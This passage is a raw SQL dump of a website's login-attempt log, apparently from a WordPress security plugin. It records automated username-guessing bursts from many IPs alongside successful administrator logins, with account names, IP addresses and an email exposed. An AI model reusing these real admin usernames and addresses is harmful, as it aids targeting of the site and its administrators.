Safari/537.36'),(18907,113370,1692862040.267964,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18908,113371,1692862040.444244,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18909,113372,1692862040.672660,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18910,113373,1692862040.849668,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18911,113374,1692862041.027254,1,'loginFailInvalidUsername','owsadmin',0,0x00000000000000000000FFFF34B06219,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18912,113383,1692867191.664718,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5DB95792,'Mozilla/5.0 (Linux; Android 12; Pixel 3a XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18913,113384,1692867193.782070,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFB9DC6544,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18914,113386,1692867198.722635,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF6169FF42,'Mozilla/5.0 (Linux; Android 11; SM-A102U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18915,113387,1692867203.780141,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF3C1EA23A,'Mozilla/5.0 (Linux; Android 11; moto g power (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18916,113388,1692867206.261308,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFBE05CAA4,'Mozilla/5.0 (Linux; Android 11) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile DuckDuckGo/5 Safari/537.36'),(18917,113389,1692867208.574262,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFB51E0F5C,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15'),(18918,113397,1692870240.749099,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF7503CB86,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.7 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18919,113398,1692870242.209632,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF5B86D4B0,'Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G891A) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18920,113399,1692870244.166680,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFC5FBC3EE,'Mozilla/5.0 (Linux; Android 9; LGL722DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18921,113400,1692870246.637938,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFBB670056,'Mozilla/5.0 (Linux; Android 10; moto g(7) optimo maxx(XT1955DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18922,113401,1692870260.458195,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF6EE8563E,'Mozilla/5.0 (Linux; Android 11; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18923,113402,1692870262.030886,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF9D6151BC,'Mozilla/5.0 (Linux; Android 11; SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18924,113403,1692870263.899953,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF5BCAE69C,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/194.0.419363360 Mobile/15E148 Safari/604.1'),(18992,115414,1693278879.754944,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18861,113047,1692726717.205091,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF67A52A66,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(19001,116028,1693305828.433847,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF67D8380A,'Mozilla/5.0 (Linux; Android 9; LG-H932) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18993,115415,1693279255.101983,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18994,115419,1693282942.748266,1,'loginFailInvalidUsername','jhonbauwens',0,0x00000000000000000000FFFF239D587D,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0'),(18995,115999,1693300604.798081,1,'loginFailInvalidUsername','Damienchrego',0,0x00000000000000000000FFFF8D8A8EF6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0'),(18996,116002,1693303955.774969,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF29BFE1CA,'Mozilla/5.0 (Linux; Android 12; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18997,116003,1693303957.663377,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFB2D4313C,'Mozilla/5.0 (Linux; Android 11; SM-N976U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18998,116004,1693303960.048117,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF67788739,'Mozilla/5.0 (Linux; Android 12; SM-G998U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18999,116005,1693303962.350092,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFAAEFF70B,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19000,116027,1693305825.879710,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF5BBF266B,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(19166,117246,1693927851.809543,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19219,117730,1694138122.247358,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF287AC9E0,'Mozilla/5.0'),(19235,117924,1694317031.619586,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF9CF44084,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Mobile/15E148 Safari/604.1'),(19236,117925,1694317036.064578,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFCA39D206,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36/GTNNlnoB-44'),(19237,117964,1694352015.100793,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19238,117965,1694352248.362443,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19257,118056,1694415420.119975,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(19535,129528,1698454573.746587,1,'loginFailInvalidUsername','administrator',0,0x00000000000000000000FFFF6BBD0B51,'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(19536,129634,1698475245.608099,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF26292955,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(19537,129634,1698475245.613413,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF26292955,'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(19538,129685,1698505103.757443,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860D197,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19009,116089,1693348421.146276,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19010,116090,1693348421.945678,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19011,116091,1693348422.176321,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19012,116092,1693348422.399989,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19013,116093,1693348422.623223,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19014,116094,1693348422.846603,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19015,116095,1693348423.070089,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19016,116096,1693348423.296982,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19017,116097,1693348423.519977,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19018,116098,1693348423.749725,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19019,116099,1693348423.974180,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19020,116100,1693348424.207307,1,'loginFailInvalidUsername','munoz',0,0x00000000000000000000FFFF14F238A7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19021,116115,1693374763.394922,1,'loginFailInvalidUsername','Johan',0,0x00000000000000000000FFFF334F1327,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0'),(19022,116120,1693386418.662606,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB9C1B2D6,'Mozilla/5.0 (Linux; Android 10; moto g(7) optimo maxx(XT1955DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18978,115343,1693242956.925816,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF2DC9C881,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/15.0 Chrome/90.0.4430.210 Mobile Safari/537.36'),(18979,115345,1693244126.299103,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFCA8AEC65,'Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18980,115346,1693244129.071626,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF66A4F82C,'Mozilla/5.0 (Linux; Android 12; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18981,115347,1693244131.752276,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF6F7D5AA3,'Mozilla/5.0 (iPad; CPU OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1'),(18982,115348,1693244134.792982,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF245CE07B,'Mozilla/5.0 (Linux; Android 10; Lenovo TB-X505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Safari/537.36'),(18959,114254,1693174505.629001,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF9CF44084,'Mozilla/5.0 (Linux; Android 11; SM-S515DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18960,114255,1693174508.269150,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF208DD6DA,'Mozilla/5.0 (Linux; Android 11; SM-N976V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18961,114256,1693174510.148239,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFBCA91006,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/189.0.413529291 Mobile/15E148 Safari/604.1'),(18962,114257,1693174512.637807,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF7832041A,'Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36 EdgA/97.0.1072.55'),(18963,114258,1693174515.176992,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFB750FB40,'Mozilla/5.0 (Linux; Android 12; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18944,114143,1693101263.516286,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFBAC01748,'Mozilla/5.0 (Linux; Android 10; V350U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18943,114142,1693101261.383861,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF67ABAC20,'Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18945,114144,1693101266.063824,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF67E630F3,'Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18946,114145,1693101279.328463,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF8FD09783,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1'),(18947,114146,1693101283.200539,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF2D777063,'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18948,114147,1693101285.375804,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF25E6EE26,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/184.2.407130758 Mobile/15E148 Safari/604.1'),(18949,114148,1693101991.445761,1,'loginFailInvalidUsername','contact@aking.co.in',0,0x00000000000000000000FFFF33B244E2,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0'),(18950,114203,1693144018.849764,1,'loginFailInvalidUsername','adminmarketingnx',0,0x00000000000000000000FFFF32740B07,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(18951,114204,1693146835.584619,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860AA19,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18952,114205,1693146929.173304,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860AA19,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18964,114259,1693176957.412431,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF9EFFF903,'Mozilla/5.0 (Linux; Android 11; SM-N975U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18965,114260,1693176959.567539,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF65FFA67E,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1'),(18966,114261,1693176974.970886,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF9CF44084,'Mozilla/5.0 (Linux; Android 5.1.1; SM-G530R7 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(18967,114262,1693176978.184693,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF7B1037D8,'Mozilla/5.0 (Linux; Android 5.1.1; SM-G530R7 Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36'),(18968,114263,1693176981.970134,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF711670B6,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1'),(18940,114115,1693070503.759553,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860AA19,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18941,114119,1693079177.615826,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18942,114120,1693081181.734944,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(18983,115349,1693244136.487706,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFC7429C6E,'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.26'),(18984,115350,1693244141.975022,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF66D8452C,'Mozilla/5.0 (Linux; Android 9; Moto Z (2)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18985,115351,1693244144.566210,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF67EBC719,'Mozilla/5.0 (Linux; Android 11; SM-G973U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18986,115381,1693262875.226826,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF675FEA30,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1'),(18987,115382,1693262877.996381,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFC7681874,'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18988,115383,1693262879.731083,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFCED625E6,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/92.0.4515.90 Mobile/15E148 Safari/604.1'),(18955,114247,1693158816.820019,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0'),(18956,114251,1693174073.620628,1,'loginFailInvalidUsername','itson',0,0x00000000000000000000FFFFAC689D51,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),(18957,114252,1693174484.043502,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB988B764,'Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-A115U Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.96 Mobile Safari/537.36 AlohaBrowser/3.9.3'),(18958,114253,1693174486.199972,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFBA797F36,'Mozilla/5.0 (Linux; Android 11; SM-S115DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(19037,116145,1693391962.997597,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19038,116146,1693391963.231829,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19039,116147,1693391963.450226,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19040,116149,1693393092.540898,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB2FEEAC6,'Mozilla/5.0 (Linux; Android 12; SM-F711U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(19041,116150,1693393094.128466,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFD9159749,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18972,115337,1693242944.473244,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB9C1B2D6,'Mozilla/5.0 (Linux; Android 10; LM-K300) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18973,115338,1693242946.596264,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF588AF28A,'Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18974,115339,1693242948.888058,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFB9F80FDA,'Mozilla/5.0 (Linux; Android 12; SM-G991U Build/SP1A.210812.016; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.87 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/344.0.0.8.106;]'),(18975,115340,1693242950.574762,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFBDC3B31F,'Mozilla/5.0 (Linux; Android 11; SM-N975U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18976,115341,1693242952.860785,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFC94D7F07,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1'),(18977,115342,1693242954.632160,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF80C94CBE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36/GTNNlnoB-44'),(19047,116156,1693397109.893815,1,'loginFailInvalidUsername','admin007',0,0x00000000000000000000FFFF9DE6590C,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0'),(19042,116151,1693393096.851978,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF71A12CD7,'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1'),(19043,116152,1693393099.723921,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF734B8184,'Mozilla/5.0 (iPad; CPU OS 10_3_4 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) CriOS/61.0.3163.73 Mobile/14G61 Safari/602.1'),(19044,116153,1693393101.990278,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFA4A334EF,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(19045,116154,1693393104.324802,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF80C7C8D5,'Mozilla/5.0 (X11; CrOS aarch64 13597.66.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.109 Safari/537.36'),(19046,116155,1693393109.123611,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF78ECF127,'Mozilla/5.0 (Linux; Android 12; SM-G998U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Mobile Safari/537.36'),(19031,116139,1693391961.679095,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(19032,116140,1693391961.896821,1,'loginFailInvalidUsername','danbertsan',0,0x00000000000000000000FFFFACB06762,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 